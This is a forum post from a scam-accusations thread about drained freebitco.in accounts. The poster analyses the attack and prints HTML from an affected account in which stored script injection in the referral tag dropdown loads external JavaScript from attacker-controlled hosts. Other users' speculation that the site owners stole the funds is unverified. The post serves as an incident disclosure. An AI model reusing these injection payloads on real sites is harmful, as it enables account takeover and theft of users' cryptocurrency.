Ninjastic
PostEdited versionsQuotes to this post
Post
Topic
Board Scam Accusations
Re: [WARNING] Attack on freebitco.in account
by
Zibi321
on 04/05/2024, 22:51:43 UTC
Quote from: Cacenn@outlook.com on Today at 08:49:12 PM
except that i sended 2000€ to an address that has been changed my account has been drained aswell

Thats another 19300€ worth of bitcoin.

The reason I started a topic Bitcoin is hacked and they are well aware of it.
You can not tell me that after so many people mailed them or contacted them in other ways they are not informed.
second its inpossible to change the sourcecode of a website, to change the intro page you must have access to the server and since the server is protected by cloudflare it is not that easy. therefor there is no such a thing of an injection of a wrong script, its already loaded as soon as you go to the site.

blocking the javascript results in not be able to log in nor to get the accountaddress back.

I have a ugly feeing that we all got scammed by a website and address held on the virgin islands, and that those 2 boys scouts are nicely vanished with our money.

Of course I could be wrong, but from my point of view attackers are able to put link into particular place on fbc website.
And it's exactly:
FBC -> "REFER" tab -> "ADVANCED TRACKING USING TAGS" button -> "SELECT A TAG TO VIEW ITS STATS" and link is hidden in drop down list.
It's not visible from GUI, but it was somehow placed into html code.

Link leads to malicious script which is executed during website loading.
And because of it website content can be modified.

Not affected accounts don't have any links placed/injected into their session in that location.
Affected user i.e @Drazen2003:
    <div class="center bold" style="padding-bottom:10px;">SELECT A TAG TO VIEW ITS STATS</div>
    <center>
        <select id="get_tag_stats" style="width:275px;">
            <option value>--</option>
           <option value="<script src=https://cashtravel.info/forum/main.js></script>">
                <script src="https://cashtravel.info/forum/main.js"></script>
            </option>
            <option value="<script src=https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js></script>">
                <script src="https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js"></script>
            </option>
        </select>
 
Not affected user:
    <div class="center bold" style="padding-bottom:10px;">SELECT A TAG TO VIEW ITS STATS</div>
    <center>
        <select id="get_tag_stats" style="width:275px;">
            <option value>--</option>
        </select>